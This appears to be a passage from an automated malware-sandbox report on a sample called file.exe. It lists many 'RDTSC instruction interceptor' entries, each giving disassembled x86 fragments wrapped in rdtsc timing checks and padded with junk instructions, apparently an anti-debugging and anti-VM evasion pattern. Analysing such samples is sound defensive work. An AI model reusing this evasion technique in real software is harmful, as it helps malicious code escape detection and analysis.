                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1CB0 second address: 11F1CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F07913FD828h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F37A1 second address: 11F37B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jne 00007F0790E17D70h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F37B3 second address: 11F37F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F07913FD839h 0x0000000c mov edx, dword ptr [ebp+122D2FC7h] 0x00000012 push 00000000h 0x00000014 and edi, dword ptr [ebp+122D2B3Bh] 0x0000001a push 4603DE40h 0x0000001f push eax 0x00000020 push edx 0x00000021 jno 00007F07913FD828h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F37F0 second address: 11F387B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0790DC9726h 0x00000009 jp 00007F0790DC9726h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 4603DEC0h 0x00000019 jnp 00007F0790DC972Ch 0x0000001f jmp 00007F0790DC9735h 0x00000024 push 00000003h 0x00000026 cmc 0x00000027 mov edx, dword ptr [ebp+122D338Ch] 0x0000002d push 00000000h 0x0000002f mov cx, di 0x00000032 push 00000003h 0x00000034 add dword ptr [ebp+122D1E51h], edx 0x0000003a pushad 0x0000003b jmp 00007F0790DC9734h 0x00000040 mov dword ptr [ebp+122D1F8Ch], ecx 0x00000046 popad 0x00000047 call 00007F0790DC9729h 0x0000004c jmp 00007F0790DC9730h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F387B second address: 11F3880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3880 second address: 11F3886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3886 second address: 11F389C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0790D59B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F389C second address: 11F38B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop edi 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0790DC9728h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F38B2 second address: 11F38D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D59B5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F0790D59B58h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F38D3 second address: 11F38D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F38D8 second address: 11F3945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0790D59B56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F0790D59B58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push ecx 0x00000029 pop edx 0x0000002a lea ebx, dword ptr [ebp+12455593h] 0x00000030 mov esi, dword ptr [ebp+122D2A9Bh] 0x00000036 mov esi, dword ptr [ebp+122D2BB3h] 0x0000003c xchg eax, ebx 0x0000003d jg 00007F0790D59B6Ch 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F0790D59B5Dh 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3945 second address: 11F3956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790DC972Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3956 second address: 11F395B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3A2A second address: 11F3AF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnl 00007F0790DC973Ah 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnc 00007F0790DC9739h 0x0000001a pop eax 0x0000001b mov dword ptr [ebp+122D3312h], ecx 0x00000021 push 00000003h 0x00000023 push esi 0x00000024 movsx ecx, di 0x00000027 pop ecx 0x00000028 push 00000000h 0x0000002a mov edx, dword ptr [ebp+122D2A7Bh] 0x00000030 movsx esi, di 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F0790DC9728h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D2C03h] 0x00000055 stc 0x00000056 call 00007F0790DC9729h 0x0000005b pushad 0x0000005c push esi 0x0000005d jnl 00007F0790DC9726h 0x00000063 pop esi 0x00000064 jmp 00007F0790DC9738h 0x00000069 popad 0x0000006a push eax 0x0000006b jg 00007F0790DC9736h 0x00000071 mov eax, dword ptr [esp+04h] 0x00000075 push edi 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3AF7 second address: 11F3B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0790D59B5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B0B second address: 11F3B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B0F second address: 11F3B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F0790D59B62h 0x00000013 pop eax 0x00000014 or dword ptr [ebp+122D1F8Ch], ebx 0x0000001a lea ebx, dword ptr [ebp+1245559Eh] 0x00000020 mov esi, 45357885h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B47 second address: 11F3B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B4B second address: 11F3B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205982 second address: 1205987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214B37 second address: 1214B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0790D59B63h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D654E second address: 11D6554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BBA second address: 1212BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BC0 second address: 1212BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F0790DC9738h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jc 00007F0790DC9726h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212EA3 second address: 1212EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212EA7 second address: 1212EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0790DC9726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212EB3 second address: 1212EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121318F second address: 12131A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F0790DC972Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121360D second address: 121362E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D59B68h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121362E second address: 1213632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213632 second address: 1213648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D59B62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213648 second address: 121364E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209C89 second address: 1209C8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209C8F second address: 1209C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209C95 second address: 1209CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007F0790D59B5Eh 0x00000011 jo 00007F0790D59B5Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7FA8 second address: 11D7FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7FAE second address: 11D7FB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121423B second address: 1214247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214247 second address: 121424B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121424B second address: 121424F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209CAA second address: 1209CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0790D59B5Eh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1218514 second address: 121851A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1218793 second address: 1218798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9D1 second address: 121A9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9D9 second address: 121A9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12209BC second address: 12209C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0790DC9726h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12209C7 second address: 12209D6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0790D59B58h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FFB2 second address: 121FFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122055D second address: 122057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jp 00007F0790D59B56h 0x0000000e jmp 00007F0790D59B5Ah 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122057C second address: 1220580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220711 second address: 1220717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220717 second address: 122071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122309D second address: 12230A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0790D59B56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12232B4 second address: 12232CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F0790DC9726h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12233D4 second address: 12233D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12233D9 second address: 12233F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0790DC9731h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223A7A second address: 1223A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223E19 second address: 1223E23 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790DC972Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223F47 second address: 1223F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224030 second address: 122404A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790DC9735h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122404A second address: 12240B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F0790D59B58h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 pushad 0x00000026 sub dword ptr [ebp+122D34A4h], edx 0x0000002c jmp 00007F0790D59B64h 0x00000031 popad 0x00000032 movsx esi, ax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jnp 00007F0790D59B69h 0x0000003e jmp 00007F0790D59B63h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12274FC second address: 1227506 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0790DC9726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227506 second address: 122755B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0790D59B5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D28BDh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F0790D59B58h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub si, C9F5h 0x00000032 push 00000000h 0x00000034 jmp 00007F0790D59B5Ah 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jne 00007F0790D59B58h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228A1E second address: 1228A28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0790DC972Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228A28 second address: 1228A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jc 00007F0790D59B56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228A3A second address: 1228A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ACCC second address: 122AD4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D59B69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F0790D59B5Ah 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F0790D59B58h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D375Dh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F0790D59B58h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push 00000000h 0x0000004f xor edi, dword ptr [ebp+122D1AA9h] 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push esi 0x0000005a pop esi 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229B8A second address: 1229B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229B96 second address: 1229B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AEA5 second address: 122AEBD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0790DC9726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0790DC972Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BD58 second address: 122BD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BD5C second address: 122BD62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BD62 second address: 122BDF0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0790D59B6Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F0790D59B56h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F0790D59B58h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jmp 00007F0790D59B68h 0x00000035 push edx 0x00000036 jc 00007F0790D59B56h 0x0000003c pop edi 0x0000003d push 00000000h 0x0000003f mov bh, ch 0x00000041 push 00000000h 0x00000043 mov di, 9971h 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F0790D59B5Ah 0x00000050 jnp 00007F0790D59B56h 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AF8B second address: 122AF95 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790DC9726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE34 second address: 122CEAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0790D59B58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 je 00007F0790D59B57h 0x00000028 cmc 0x00000029 push 00000000h 0x0000002b xor bx, BB04h 0x00000030 push 00000000h 0x00000032 add edi, dword ptr [ebp+122D1844h] 0x00000038 xchg eax, esi 0x00000039 je 00007F0790D59B6Fh 0x0000003f jno 00007F0790D59B69h 0x00000045 push eax 0x00000046 pushad 0x00000047 push ebx 0x00000048 push eax 0x00000049 pop eax 0x0000004a pop ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0790D59B61h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BF81 second address: 122BF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
